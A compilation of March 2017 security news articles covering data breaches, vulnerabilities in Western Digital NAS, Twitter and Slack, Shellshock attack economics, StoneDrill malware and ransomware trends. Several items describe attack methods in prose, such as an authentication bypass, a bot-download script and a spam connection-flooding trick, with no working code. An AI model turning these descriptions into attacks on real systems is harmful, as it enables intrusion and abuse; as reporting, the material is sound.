This is not the first time when the researchers came across a Fileless malware. At early last month, Kaspersky researchers also discovered fileless malware, that resides solely in the memory of the compromised computers, targeting banks, telecommunication companies, and government organizations in 40 countries.
Hacker Selling Over 1 Million Decrypted Gmail and Yahoo Passwords On Dark Web
6.3.2017 thehackernews Hacking
Hardly a day goes without headlines about any significant data breach. In past year, billions of accounts from popular sites and services, including LinkedIn, Tumblr, MySpace, Last.FM, Yahoo!, VK.com were exposed on the Internet.
Now, according to the recent news, login credentials and other personal data linked to more than one Million Yahoo and Gmail accounts are reportedly being offered for sale on the dark web marketplace.
The online accounts listed for sale on the Dark Web allegedly contain usernames, emails, and plaintext passwords. The accounts are not from a single data breach; instead, several major cyber-attacks believed to have been behind it.
The hacker going by the online handle 'SunTzu583' has listed a number of cracked email packages on a series of dark websites, HackRead reported.
Here's the Full List of Accounts and their Prices:
100,000 Yahoo accounts acquired from 2012 Last.FM data breach, for 0.0084 Bitcoins ($10.76).
Another 145,000 Yahoo accounts acquired from two separate data breaches – the 2013 Adobe data breach and the 2008 MySpace breach – for 0.0102 Bitcoins (USD 13.75).
500,000 Gmail accounts from the 2008 MySpace hack, the 2013 Tumblr breach, and the 2014 Bitcoin Security Forum breach for 0.0219 Bitcoins ($28.24).
Another 450,000 Gmail accounts for 0.0201 BTC (USD 25.76), which came from various other data breaches in Dropbox, Adobe, and others that took place between 2010 and 2016.
Last.FM data breach from 2012 exposed 43 million user accounts that were publicly released in September last year.
Adobe breach from October 2013 exposed over 153 million accounts containing internal IDs, usernames, emails, encrypted passwords and a password hint in plain text.
MySpace data breach from 2008 exposed 360 million user accounts, containing usernames, emails and their decrypted (plaintext) passwords, which were leaked on the dark web in 2016.
Google’s Gmail email service is known to be one of the most secure email services, but no company can secure their accounts from hackers due to a third party data breach.
Millions of Gmail accounts, in which usernames, emails, and plaintext passwords were exposed, were stolen in multiple data breaches in Bitcoin Security Forum, Tumblr, Last.fm, 000webhost, Adobe, Dropbox, Flash Flash Revolution, LookBook and Xbox360 ISO, happened between 2008 and 2016.
The data listed for sale by SunTzu583 has not been independently verified by The Hacker News, but has reportedly been checked by matching it to the data on a number of data breach notification platforms, including Hacked-DB and HaveIBeenPwned.
Here's What All You Can Do:
Needless to say, you should immediately change almost all your account passwords at least once.
Also enable two-factor authentication for all your online accounts immediately.
And once again, a strong recommendation: Don't Reuse Passwords.
Also, you are recommended to change your password every few months, which limits how long a stolen password is useful to a hacker.
Since no one can remember and recreate strong passwords for every single online account regularly, the best practice is to use a good password manager. It will generate, store and change regularly strong, unique passwords for all your accounts.
Multiple Zero-days Disclosed in Western Digital NAS Storage Devices
6.3.2017 securityweek Vulnerebility
The Western Digital My Cloud range of storage devices, ranging from consumer products with up to 16TB storage (My Cloud Mirror) to business devices with up to 32TB storage (My Cloud Pro and My Cloud Expert) contain multiple firmware vulnerabilities that can be exploited remotely.
Bugs reported by Zenofex of Exploiteers comprise of a login bypass, an arbitrary file write, 13 unauthenticated command execution bugs, and 70 authentication required bugs. The authentication required bugs can be reached via the login bypass bug.
In a blog posted on Saturday, Zenofex explains that he was analyzing a bug that had separately been found and reported (with others) to Western Digital by ESET researcher Kacper Szurek. In January, Szurek reported that on 1 January 2017, Western Digital told him the issue had been fixed.
Meanwhile, Securify also issued an advisory on the same authentication bypass bug. The timeline is very similar to Szurek's but quotes a different firmware release to fix the bug -- and laments that it had not been informed by Western Digital that the bug had been fixed.
Zenofex does not quote firmware release numbers. He merely wrote on Saturday that in patching the old bug, Western Digital had introduced a new one with the very same consequences into its latest firmware. Western Digital 'fixed' the old cookie-based vulnerability by adding a new "wto_check()" function. The problem here, says Zenofex, "is the incorrect use of the PHP method "escapeshellcmd()" which, in its intended usage, handles an entire command string, and not just an argument... Because of this," he adds, "instead of actually checking if the user is logged in, we can add new arguments and log the user in ourselves."
Once the attacker has logged on, he can exploit any one of many unsanitized CGI scripts. Instead of being properly sanitized, they appear to rely on only being accessible to an authenticated user -- which cannot be guaranteed because of the authentication bypass vulnerability. "This basic pattern resulting in a command injection vulnerability is used multiple times within the many scripts used by the web interface," comments Zenofex. "Also, it is important to note that all commands executed through the web interface are done so as the user the web-server is running as, which, in this case is root."
Users of My Cloud products should note that these are effectively zero-day vulnerabilities with published exploits. Zenofex explained that he has little confidence in Western Digital's willingness to patch the faults rapidly. He pointed out that Szurek mentioned a second bug -- a remote root execution vulnerability as well as the authentication bypass. "Although the reported authentication bypass vulnerability was 'patched'," Zenofex told SecurityWeek, "the fact that the more dangerous of the two bugs has been left unfixed does not give us confidence in the manufacturer."
To this he adds Western Digital's Pwnie award for the Lamest Vendor Response at last summer's Vegas BlackHat. This followed the 2015 discovery that Western Digital's 32-bit encryption key was actually a 4-bit key repeated eight times -- making it very weak. A Western Digital spokesperson said at the time, "We continue to evaluate the observations."
This, Zenofex told SecurityWeek, "eliminates the confidence we have in regards to a manufacturer's ability to properly triage and fix vulnerabilities in their code. It's also important to note that in all our previous research on consumer devices, until researching the My Cloud, we hadn't come across an administrator interface with as many severe security vulnerabilities as that found through our research in this product. To us this signifies a code base that had not properly been audited prior to its use within a retail product as well as programmers who are unaware of safe programming practices."
This is not the first time that exploiteers have found bugs in patched code. Patches to Samsung SmartCams were revealed in January to be incomplete.
Exploiteers started life in 2011 as GTVHacker, with, explained Zenofex, "the intention to help unlock devices within the GoogleTV platform. These GoogleTV devices were being created by manufacturers and came locked to a specific configuration. The devices would then be abandoned shortly after their launch causing the consumer to buy a new device, sending the old one to the landfill. Our goal was to give the consumers the ability to unlock their devices and repurpose them, preventing the need to purchase another. A few years after our conception, the GoogleTV platform died and we renamed ourselves 'Exploitee.rs'. This fits our new mission statement: hacking everything and therefore creating a better state for online devices."
Western Digital has been invited to respond to Zenofex's exploits and criticisms, and has promised to do so later today. We will update this article as soon as any response is received.
Shellshock Attacks Still Cheap and Easy: IBM
6.3.2017 securityweek Virus
Two and a half years after being discovered, the Shellshock vulnerability continues to be abused in attacks, and for a good reason: it is a very cheap and easy attack, IBM says.
Discovered in September 2014, Shellshock is a vulnerability found within the bourne-again shell (BASH), the default command shell in almost each and every Linux and Unix system at the time. An attacker able to abuse the security flaw could execute commands with super-user privileges remotely.
Tracked as CVE-2014-6271, the issue was found to affect a great deal of devices, including Web servers and Internet-of-Things (IoT) devices such as DVRs, printers, automotive entertainment systems, routers and even manufacturing systems. Mac OS X systems were also impacted.
With many applications relying on BASH, an attacker could exploit the vulnerability by sending a command sequence to the web server to be interpreted with the BASH. Attacks abusing the security issue were reported immediately after the vulnerability became public knowledge.
In July 2015, researchers warned that Shellshock was still being abused, and the attacks continue nearly two years later. Many vulnerable devices haven’t been patched to this day, and attackers are enticed to continue hitting those targets.
“Attackers need only a server, basic programming skills and access to malware to carry out this type of attack. The level of knowledge and effort required is quite low. Fraudsters can simply launch attacks against hundreds of different IP addresses per minute and wait to hit a vulnerable server by chance,” IBM’s Joerg Stephan explains.
To carry out a Shellshock attack, an attacker only needs to spend around $5 a month, Stephan says. For just over $30, an attacker could target around 1 million servers within a six-month period, which could translate into 100,000 victims, as roughly 10% of all servers remain unpatched, IBM says.
To set up the attack, an actor would need a webserver to host the malicious code, which can be an Apache or lighthttp server. To show just how simple it would be to come up with the necessary code, IBM’s researcher published some basic Python code that can do the trick.
A bash script would download a bot from the server, save it to a certain path, make the file executable and run it, and could also include a line to execute the bot after each reboot, for persistence. Next, an attacker would need to get the target to execute the BASH script and execute it, to exploit Shellshock.
“With some more scripting effort, you could easily execute the curl statement against a full network range, or even the whole internet, but it will take a while,” the researcher says. In the end, however, the verdict stands: setting up a server to run Shellshock attacks for months is so cheap that the vulnerability continues to be of interest.
Temporary Fix Available for Windows GDI Vulnerability
6.3.2017 securityweek Vulnerebility
A temporary fix is available for the Windows Graphics Device Interface (Windows GDI) vulnerability that was disclosed a couple of weeks ago.
The flaw was initially discovered by Mateusz Jurczyk, an engineer with Google's Project Zero team, in March 2016, along with other issues in the user-mode Windows GDI library (gdi32.dll). Microsoft attempted to resolve the bug with its June 2016 patches but failed to do so, and the researcher filed another report in November 2016.
As per Google’s Project Zero’s policy, vendors have 90 days to resolve the disclosed vulnerabilities before they are made public, and this policy applied to the Windows GDI flaw as well. However, because Microsoft didn’t release a monthly set of security updates in February, but pushed the patches to March, the vulnerability wasn’t resolved within the 90 days window.
Tracked as CVE-2017-0038, the vulnerability is related to the handling of DIBs (Device Independent Bitmaps) embedded in EMF records. The security researcher who discovered it was able to reproduce the vulnerability both locally (in Internet Explorer) and remotely (in Office Online, using a DOCX file containing a specially crafted EMF file).
Although Microsoft hasn’t released a fix for the issue yet, Luka Treiber with the 0patch Team devised a temporary fix for the issue. For that, the researcher worked with the proof of concept that Google’s Jurczyk published, and says that the issue was visible each time the specially crafted EMF file was loaded in Internet Explorer 11.
“CVE-2017-0038 is a bug in EMF image format parsing logic that does not adequately check image dimensions specified in the image file being parsed against the amount of pixels provided by that file. If image dimensions are large enough the parser is tricked into reading memory contents beyond the memory-mapped EMF file being parsed,” Treiber explains.
By leveraging this vulnerability, an attacker could steal sensitive data that an application holds in memory, but could also abuse it in other attacks, where they need to defeat Address space layout randomization (ASLR).
The fix for the flaw, the security researcher explains, needs to include a check that cbBitsSrc (the size of source bitmap bits) is smaller than cxSrc * cySrc * 4 (width of the source rectangle, in logical units * height of the source rectangle, in logical units * number of bytes representing each pixel). The researcher notes that he first focused on finding the right location for the patch, before writing it, so that he could write as little code as possible.
The temporary fix for the zero-day Windows GDI issue should be already available on machines with 0patch Agent installed, because they already have patches ZP-258 through ZP-264, the researcher says. Moreover, he notes that Microsoft’s patch for this will replace this fix.
“Note that when Microsoft’s update fixes this issue, it will replace the vulnerable gdi32.dll and our patch will automatically stop getting applied as it is strictly tied to the vulnerable version of the DLL. We have deployed this patch for the following platforms: Wind ows 10 64bit, Windows 8.1 64bit, Windows 7 64bit and Windows 7 32bit,” the researcher says.
It should also be noted that security vendors have already updated their products to keep them safe from potential attacks attempting to abuse this vulnerability.
Shamoon-Linked "StoneDrill" Malware Allows Spying, Destruction
6.3.2017 securityweek Virus
Researchers at Kaspersky Lab have come across a new and sophisticated piece of malware that can be used for both cyber espionage and wiping an infected computer’s storage.
Dubbed “StoneDrill,” the malware has been linked to the notorious Shamoon 2 and Charming Kitten, aka Newscaster and NewsBeef, a threat actor believed to be located in Iran.
The security firm has observed the threat being used in attacks aimed at entities in Saudi Arabia and one organization in Europe. Unlike in the case of Shamoon, which is known to have caused significant damage to oil giant Saudi Aramco, there are no reports of damaging attacks involving StoneDrill.
Kaspersky Lab discovered StoneDrill using Yara rules created in an effort to identify unknown samples of Shamoon, aka Disttrack. Shamoon and StoneDrill don’t have the same codebase, but researchers said their authors’ programming style and mindset are similar.
While it’s unclear exactly how StoneDrill has been delivered to victims, once it infects a machine, the malware injects itself into the web browser process and uses sophisticated techniques designed for evading security products.
The threat targets both physical and logical drives, and reboots the system once the wipe process is completed. Researchers pointed out that the wiper functionality in StoneDrill has been implemented using a new technique.
Kaspersky has also identified a StoneDrill sample designed to act as a backdoor, likely for espionage operations. Researchers have identified four command and control (C&C) servers used for spying on an unknown number of targets.
While there are similarities between StoneDrill and Shamoon, such as the October-November 2016 sample compilation dates and the fact that both store their payload inside encrypted resources, there are some significant differences. For instance, Shamoon doesn’t use advanced evasion techniques, it doesn’t rely on external scripts, and it leverages drivers instead of memory injections.
Furthermore, StoneDrill uses C&C communications, which allows the attackers to interact with the malware instead of having to use a “kill time” as in the Shamoon attacks.
On the other hand, Kaspersky said StoneDrill seems more similar to a piece of malware used in APT campaigns attributed to Charming Kitten. Researchers discovered similarities in code, C&C naming conventions, backdoor commands and functionality, and Winmain signatures. In fact, StoneDrill appears to be an evolution of Charming Kitten malware.
While it is possible that StoneDrill is just another wiper used by the Shamoon actor, a more likely scenario, according to Kaspersky, is that these are separate groups with largely the same objectives.
“When it comes to artefacts we can say that while Shamoon embeds Arabic-Yemen resource language sections, StoneDrill embeds mostly Persian resource language sections. Geopolitical analysts would probably be quick to point out that both Iran and Yemen are players in the Iran-Saudi Arabia proxy conflict, and Saudi Arabia is the country where most victims of these operations were found,” explained Kaspersky’s Mohamad Amin Hasbini. “But of course, we do not exclude the possibility of these artefacts being false flags.”
Shamoon, which had been delivered to victims via weaponized documents, has been linked to several groups believed to be operating out of Iran. Symantec reported recently that the threat actor behind the Shamoon attacks may have been aided by the groups tracked as Magic Hound (aka Timberworm and COBALT GYPSY) and Greenbug. These groups have been connected to both Charming Kitten and Rocket Kitten.
Twitter Flaw Allowed Access to Locked Accounts
6.3.2017 securityweek Social
Twitter was until a few months ago affected by a vulnerability that could have been exploited to bypass the social media network’s account locking mechanism.
Twitter can lock user accounts for security purposes if it detects suspicious behavior which could indicate that an account may have been compromised. In order to have the account unlocked, the user needs to confirm they are the legitimate owner by providing some information, such as phone number and email address.
Security expert Aaron Ullger discovered that this account locking mechanism could have been easily bypassed by adding the targeted account to a mobile device. The researcher added the locked account to his iPhone (via the Settings page), installed the Twitter app on the device, and he was given full access to the account.
However, Ullger noticed that the targeted account remained locked on the Twitter website so the bypass had not been complete. In order to achieve a complete bypass, the expert used the iOS Twitter app to access the account’s settings and obtain the email address and phone number needed to unlock the account.
This vulnerability could have been useful for an attacker who had stolen the targeted user’s credentials, but wanted to prevent being locked out of the account.
“An attacker with knowledge of a locked account’s credentials would’ve been able exploit this issue to gain complete access to the victim’s profile,” Ullger said in a blog post.
The flaw was reported to Twitter on October 7 and it was patched a few days later. The researcher said he received an unspecified bug bounty for his work.
Last year, Ullger also reported finding a way to bypass the password reset initiated by Tumblr following the discovery of a significant data breach.
Twitter has been running a bug bounty program on the HackerOne platform since September 2014. Bug bounty hunters can earn as much as $15,000 for a serious remote code execution vulnerability affecting the company’s core services.
According to its HackerOne page, Twitter has so far received nearly 600 vulnerability reports and it has paid out a total of more than $600,000.
Spammers Leak 1.4 Billion User Records
6.3.2017 securityweek Spam
A company run by a couple of known spammers has unknowingly leaked a series of files containing sensitive information about its operations, including nearly 1.4 billion user records.
River City Media (RCM), which claims to be a legitimate marketing firm, is run by Matt Ferris and Alvin Slocombe, both listed in Spamhaus’ Register of Known Spam Operations (ROKSO).
Slocombe is said to be involved with the bulletproof spam host Cyber World Internet Services, which is believed to have launched spam campaigns using aliases such as Ad Media Plus, RCM Delivery, eBox, Brand 4 Marketing and Site Traffic Network.
MacKeeper researcher Chris Vickery, who has made a name for himself after finding misconfigured databases exposing large amounts of potentially sensitive data, discovered a freely accessible Rsync backup belonging to River City Media.
The leaked data has been analyzed by Vickery, Spamhaus, and IDG’s CSO Online. Law enforcement has also been alerted as some of the exposed files appear to contain evidence of illegal activities. Tech giants such as Microsoft and Apple have also been notified.
According to Vickery, the leaked data includes documents (e.g. financial data), backups and chat logs. One of the most interesting files is a database containing 1.37 billion user records, including names, email addresses, physical addresses and IPs.
The expert, whose investigation showed that much of the data appears to be valid, believes the vast amount of information was collected by the spammers through credit checks, sweepstakes, education opportunities and other similar activities.
“Well-informed individuals did not choose to sign up for bulk advertisements over a billion times. The most likely scenario is a combination of techniques,” Vickery said in a blog post. “One is called co-registration. That’s when you click on the ‘Submit’ or ‘I agree’ box next to all the small text on a website. Without knowing it, you have potentially agreed your personal details can be shared with affiliates of the site.”
The exposed data, which Vickery believes will lead to the downfall of this “spam empire,” also includes information on the illegal tools and techniques used by RCM. For example, one of the leaked files describes a technique leveraged by the spammers to target Gmail servers by opening as many connections as possible between them and the targeted server.
“This is done by purposefully configuring your own machine to send response packets extremely slowly, and in a fragmented manner, while constantly requesting more connections,” the researcher explained. “Then, when the Gmail server is almost ready to give up and drop all connections, the spammer suddenly sends as many emails as possible through the pile of connection tunnels. The receiving side is then overwhelmed with data and will quickly block the sender, but not before processing a large load of emails.”
RDP Tops Email for Ransomware Distribution: Report
6.3.2017 securityweek Virus
The Remote Desktop Protocol (RDP) is an increasingly popular distribution vector among ransomware operators, so popular in fact that it appears to have surpassed email, recent statistics from Webroot suggest.
RDP attacks have been used for the distribution of malware for several years, but they have become a ransomware distribution vector only recently.
Last year, numerous attacks that brute-forced RDP credentials for ransomware distribution were reported, including those involving Bucbi, Apocalypse, and Shade. In May 2016, Fox-IT suggested that RDP was indeed becoming a new infection vector in ransomware attacks, and Kaspersky Lab researchers in September associated the method with the distribution of Xpan in Brazil.
In February 2017, Trend Micro revealed that the Crysis ransomware was being distributed via RDP attacks too. While the method had been employed since September 2016, the number of such attacks doubled in January 2017 when compared to the previous months, the security firm said.
A chart published by Webroot this week shows that RDP is more widespread than email when it comes to ransomware vectors: 66% versus 33%. Historically, ransomware has been distributed via other methods as well, including exploit kits and malvertising, but the traffic associated with these vectors doesn’t not appear to be as popular.
“Over the last couple of months, the data we’ve seen underscores how important it is for system admins to secure RDP. Unsecured RDP essentially leaves the front door open for cybercriminals. And since modern criminals can just encrypt your data, instead of having to go through the trouble of stealing it, we shouldn’t make it any easier for them to get what they want,” the security firm notes.
When it comes to ransomware families that use RDP, Crysis is the most prevalent. At the moment, the variant being distributed appends the “.wallet” extension to encrypted files, but around half a dozen other variants have been observed to date.
Other well-known pieces of ransomware that users should be aware of include Locky, Cerber, CryptoMix, or Samas, which emerged over a year ago and continue to wreak havoc. However, newer malware families are also worth taking into consideration, such as Spora, which was first detailed only this year.
CrowdStrike Vs NSS Labs, Round 2: NSS Hits Back
6.3.2017 securityweek Security
In February 2017, endpoint protection firm CrowdStrike took the unusual step of suing independent product testing organization NSS Labs, "to hold it accountable for unlawfully accessing our software, breaching our contract, pirating our software, and improper security testing."
The immediate purpose of the suit was to support action for an injunction to prevent NSS Labs from publishing test result details of CrowdStrike's Falcon endpoint security product within its latest public test. The injunction failed, and NSS published the results.
At the time, NSS Labs issued brief statements but published no lengthy response to CrowdStrike's blogged accusations of 'unlawful conduct' and 'deeply flawed methodology'. Now it has done so.
"Given the serious inaccuracies CrowdStrike has been promoting in their blog and elsewhere, we decided that we needed to tell our side of the story," blogged NSS CEO Vikram Phatak. The blog amounts to a step-by-step refutation of CrowdStrike's accusations.
Where CrowdStrike claims the tests are incomplete (it disconnected its cloud-based Falcon before the tests were complete) and the results therefore invalid, NSS claims that CrowdStrike's results were not penalized. "CrowdStrike did not receive a zero (0) for the parts of the test we were unable to complete - because we believed that penalizing CrowdStrike for disabling the product could mislead the public." It also points out that Falcon had missed various attacks before the disconnection, and that those attacks would remain missed whether the full testing had been completed or not.
A primary thrust of CrowdStrike's arguments is that it had "declined to participate in a public test after completing a private test with NSS, based on NSS' flawed and improper testing execution."
The NSS response is that it is not open for individual companies to withdraw from a public test. "NSS Labs informed CrowdStrike that our position, as always, is that if a product is good enough to sell to the public, it is good enough to be tested and that we would purchase their product if necessary." NSS tried to buy the product, was blocked by CrowdStrike, but "found an enterprise who would be willing to work with us to purchase the product."
CrowdStrike Falcon was subsequently part of the NSS public tests, but failed to complete because CrowdStrike disconnected it from its cloud before completion.
It is an unsightly squabble; but one that has been threatening for many months. Next-gen endpoint protection firms have tended to claim that the in situ anti-virus products do not work. Those 'legacy' firms have responded that independent testing would settle the issue. To begin with, next-gens replied that their products could not be tested in the same way as legacy products (and it should be said that they had a point).
The testing laboratories, however, have spent considerable time and effort in improving their testing techniques specifically for next gens -- and many next-gens are now happy to take part. Three other next-gen products included in the same tests did rather well: Cylance at 99.69%, SentinelOne at 99.79%, and Invincea at 99.49%. CrowdStrike did less well at 74.17%.
Anup Ghosh, founder and CEO at Invincea, accepts that there have been difficulties in testing, but believes that cooperation rather than withdrawal is the answer. "We are really excited about how well we did in the NSS Labs AEP test," he told SecurityWeek. "We won't comment on competitors or competitors' behavior. I think you know our stance on third party testing: it should be done early and often and with multiple reputable third party testers. NSS Labs does a good job in 'real world' exploits and evasions techniques, but every test shop has its pros and cons. That's why we try to participate in as many public reputable third party tests as possible."
SecurityWeek approached CrowdStrike for a response to the NSS blog, but has not recieved a reply.
A bug in Twitter allowed hackers to access to locked accounts until October
6.3.2017 securityaffairs Crime
A flaw in Twitter allowed attackers to access locked accounts bypassing the locking mechanism implemented by the company.
A flaw in the Twitter application allowed, until a few months ago, to access locked accounts bypassing the locking mechanism implemented by the IT giant.
Twitter can lock user accounts every time it believes the users are abusing its services for activities not allowed by the usage policy or for security reason, if the company identify suspicious behavior which could indicate that an account may have been hacked.
In order to unlock the account, the owner needs to confirm his identity by providing some information, such as the email address and the phone number.
The security expert Aaron Ullger devised a method to bypass the Twitter account locking mechanism by adding the targeted account to a mobile device.
“I recently found a flaw in the lockout mechanism Twitter has in place to protect accounts from unauthorized access. This flaw resulted in a complete bypass of the verification page which is presented to users if their account is locked.” reads the post published by Ullger.
The researcher added the Twitter locked account to his iPhone via the mobile Settings page, then it was enough to install the Twitter app on the device to get full access to the account.
Ullger explained that even with this procedure the account remained locked on the Twitter website. In order to complete the bypass procedure, the attacker needs to retrieve the information to unlock it. In order to achieve his goal, Ullger used the iOS Twitter app to access the account’s settings and get the email address and phone number of the legitimate owner of the account. At this point, the attacker can unlock the Twitter locked account by starting the official verification procedure.
“After some more failed attempts, I remembered that it was possible to add your Twitter account to your iPhone through device settings.” wrote the expert. “
“The settings option for Twitter (which allows you to add/remove Twitter accounts) is present on your phone even if you’ve never installed the Twitter app before. “I was able to add my locked Twitter account to my device through settings without any problems.”
The researchers highlighted that the exploitation of the flaw was useful when an attacker who had stolen the targeted user’s credentials wants to prevent being locked out of the account.
“I was then able to submit this information on the verification page I was previously displayed, which allowed me to login to the desktop Twitter site as well. The locked flag was then completely removed from my account.” Ullger wrote in a blog post.
“An attacker with knowledge of a locked account’s credentials would’ve been exploitable this issue to gain complete access to the victim’s profile.”
Below the timeline of the vulnerability:
Oct 7, 2016 – Report sent
Oct 7, 2016 – Report triaged by Twitter
Oct 11, 2016 – Issue marked as fixed, report resolved by Twitter
Oct 14, 2016 – Bounty awarded
The flaw was reported to Twitter on October 7 and it was patched a few days later. The researcher said he received an unspecified bug bounty for his work.
Twitter launched a bounty program in 2014, it is run on the HackerOne platform and bug hunters could earn up to $15,000 for most severe issues.
Since 2014, Twitter has paid out a total of more than $600,000 for 600 vulnerabilities.
The total potential loss for financial services globally is estimated at £8 billion
6.3.2017 securityaffairs Crime
Researchers at ThreatMetrix observed that online financial services and lending companies were the most targeted by crooks in 2016.
Online financial services, lending companies, and alternative payment systems are privileged targets of threat actors. According to the researchers at the security firm ThreatMetrix, the number of cyber attacks against online lending companies and alternative payment systems increased by 122% in 2016.
The cyber attacks against financial services cost consumers £8bn in 2016, the significant increment is associated with the increased propensity of customers in using online financial services.
“Due to its surge in popularity, and fast transaction cycles, online lending has become a prime target for cyber criminals,” explained Vanita Pandey, vice president of strategy at ThreatMetrix. “Online lenders are under increasing pressure to adopt smarter authentication methods to accelerate genuine loans and prevent fraud.”
Let us consider that the number of financial services transactions online in the UK grew by 10% in 2016.
The number of attacks targeting alternative lending has increased by 150% since Q3 2016.
The vast majority of attacks against the financial services leverages on fake or stolen credentials last year, ThreatMetrix detected 80 million attacks.
The identity theft was the most common crime in the UK last year, the availability of data resulting from the numerous data breaches allowed crooks to launch an impressive number of attacks.
According to the latest ThreatMetrix Cybercrime Report, new emerging countries appear on the cybercrime frontlines, the majority of fraudulent activities originated in developing nations, including Brazil, Egypt, Ghana, Jordan, Nigeria, and Macedonia.
“Brazil emerged in Q4 as a major attack destination, and ThreatMetrix saw a significant increase in attacks coming from emerging economies, including Tunisia, Ukraine, Malaysia, Bangladesh, Pakistan, Serbia, Morocco, Guadeloupe, Qatar and Cuba. Identity spoofing is the leading attack vector in such economies.” reads the report.
Below further key findings from the report:
Nearly 122 million attacks were detected and stopped in real-time, an increase of more than 35% over the previous year.
Growth in attacks outpaced overall transaction growth, and the overall rejected transaction rate grew 15% — demonstrating heightened risk levels.
45% of transactions now come from mobile devices, rising to 55% in financial services, as users log in almost daily to check their bank balance via mobile apps. Mobile devices are increasingly becoming the primary conduit for transacting online, with businesses moving from digital-first strategies to mobile-first ones.
Mobile-only users have increased across all industry groups, rising to 40% in financial services. For a sizable minority, desktops are becoming obsolete, as the breadth and depth of mobile products and services stretches to allow mobile-only usage.
Cross-border transactions are growing in prevalence; more than a quarter of transactions in the network are now cross border, but these continue to be approached with caution and are rejected more than twice as much as domestic transactions.
Chris Vickery announced a 1.37 billion records data leak to disclose on Monday
6.3.2017 securityaffairs Crime
The popular security researcher Chris Vickery announced that he will shortly reveal the source of a massive data leak. Which is the source?
The popular cyber security expert Chris Vickery from security firm MacKeeper announced that he will shortly reveal the source of a huge data breach impacting individuals.
data leak
Follow
Chris Vickery @VickerySec
1.4 billion identity leak story incoming Monday morning.
Thanks go to @SteveD3 (and someone else) for cooperating on investigation.
11:44 PM - 3 Mar 2017
117 117 Retweets 70 70 likes
Vickery also offered a teaser of the leak, also reducing the number of identities by 30,000.
Follow
Chris Vickery @VickerySec
Teaser screenshot of that DB's summary data:
3:22 AM - 4 Mar 2017
27 27 Retweets 18 18 likes
Security experts are speculating about the name of the alleged victim of the data breach, it is a huge amount of data and this restricts the list of candidates.
Online is circulating the name of the Aadhaar, that is the world’s largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017. It includes data from more than 99% of Indians aged 18 and above.
“The data is collected by the Unique Identification Authority of India (UIDAI), a statutory authority established on 12 July 2016 by the Government of India, under the Ministry of Electronics and Information Technology, under the provisions of the Aadhaar Act 2016.”
The Indian Government promptly denied the database belongs the Aadhaar system.
“In a comprehensive clarification with regard to misinformation in some news items and articles appearing in various print and social media during the last few days alleging breach of Aadhaar data, misuse of biometrics, breach of privacy, and creation of parallel databases etc., UIDAI said that it has carefully gone into these reports and would like to emphasise that there has been no breach to UIDAI database of Aadhaar in any manner whatsoever and personal data of individuals held by UIDAI is fully safe and secure.” reads the official statement issued by the UIDAI.
“In a statement, UIDAI has said that Aadhaar based authentication is robust and secure as compared to any other contemporary systems. Aadhaar system has the capability to inquire into any instance of misuse of biometrics and identity theft and initiate action.”
Another hypothesis on the possible origin of the huge trove of data is China which the only other country with a so big archive (1.37bn identities is China). Which brings us to other candidates, namely:
Giving a look at the private sector, a limited number of companies have databases with a similar dimension.
Facebook, WhatsApp, Apple, Microsoft, Yahoo, the Chinese WeChat and the Tencent platforms IM QQ and social network Qzone.
El Reg also speculated the involvement of a data harvesting company.
“The likes of Oracle, Salesforce and Wayin have colossal databases of individuals and businesses they sell to marketers and others, and claim to have hundreds of millions of records. Can’t be discounted.” reads El Reg.
Whoever it is, the data leak highlights the poor level of security for data base exposed online.
Chris Vickery discovered many other clamorous cases of open database exposed on the Internet. In December 2015 the security expert discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.
In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.
In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.
A flaw in Slack app allowed hackers to take over a user account
6.3.2017 securityaffairs Exploit
A bug in the popular Slack application could be exploited by attackers to steal an access token and take over a user account.
A serious flaw in the popular work chat application Slack could be exploited to take over a user account.
The vulnerability was discovered by bug bounty hunter Frans Rosen who demonstrated that is possible to steal Slack access tokens to impersonate a user. The flaw resides in the way the Slack application communicates data in an internet browser.
“I was able to create a malicious page that would reconnect your Slack WebSocket to my own WebSocket to steal your private Slack token. Slack fixed the bug in 5 hours (on a Friday) and paid me $3,000 for it.” reads a blog post published by Rosen.
Slack leverages on the technology called postMessage that safely enables cross-origin communication.
Normally, scripts running on different web pages can access each other only if the pages are accessible through the same protocol (i.e. Both https), port number (443 is the default for https), and host (module Document.domain being set by both pages to the same value).
“Using window.addEventListener(‘message’, func) and window.postMessage() to pass messages is a really convenient way of performing Cross-Origin communication. However, the biggest pitfall (which we’ve covered multiple times before) is not checking the origin of the message.” explained Rosen.
Slack uses postMessage everytime it opens a new window to enable a voice call.
The Slack implementation of the postMessage lack of validation for the origin of all data exchanged between separate windows.
“Not validating them was a clear indication to me that I could start do fun stuff, like accessing the functions using postMessage to this window from another window I controlled.” added Rosen.
Once discovered the flawed implementation, the researcher demonstrated how to exploit the bug to steal a user’s access token.
Basically, he exploited the fact that if a user has a browser window, and open a new window by clicking on a link, those two windows can communicate each other through postMessage.
At this point, Rosen created a malicious page that is able to hijack the Slack application.
Below a video PoC of the hack in which the malicious webpage opens a Slack window that then forces a victim’s account to handover the access token.
Hackers who breached Barts NHS Trust exploited a zero-day vulnerability
5.3.2017 securityaffairs Vulnerebility
In January, a cyber attack breached some systems at Barts NHS Trust and forced them offline. Hackers exploited a zero-day vulnerability.
In January, a cyber attack breached some systems at Barts NHS Trust and forced them offline.
Barts Health Trust runs the Royal London, St Bartholomew’s, Whipps Cross, Mile End and Newham hospitals.
The hackers used a malicious code to bypass security measured and compromise internal systems.
Shortly after the attack, Barts NHS Trust issued an initial report that confirmed its systems had been infected by ransomware, but further investigation allowed experts to discover that attackers exploited a zero-day vulnerability.
Barts NHS Trust took offline some systems as a precautionary measure and reported that patient data had not been affected by the attack.
Law enforcement and experts are still investigating the case, but the minutes related to a recent board meeting disclosed some new information.
The malware infected all the sites run by the Barts Health Trust except Whipps Cross. The incident response worked correctly and the malware was promptly contained. The malware infected pathology systems, internal personnel switched in manual mode its operations.
“An IT virus had affected the Trust’s networks during January 2017. It was confirmed that this had affected all sites, except Whipps Cross but that the response had been effective and the Trust had swiftly returned to business as usual.” reads the minutes.”The virus had affected pathology systems (requiring the temporary use of manual systems), but no other IT systems used to deliver clinical care. A serious incident investigation was under way and further details would be shared once this had concluded.”
According to Deputy chief executive Tim Peachey, the malware that hit the systems wasn’t a ransomware, and no patient information systems had been compromised. He confirmed that the malware was able to bypass antivirus software because it had not been seen before and leveraged a zero-day exploit.
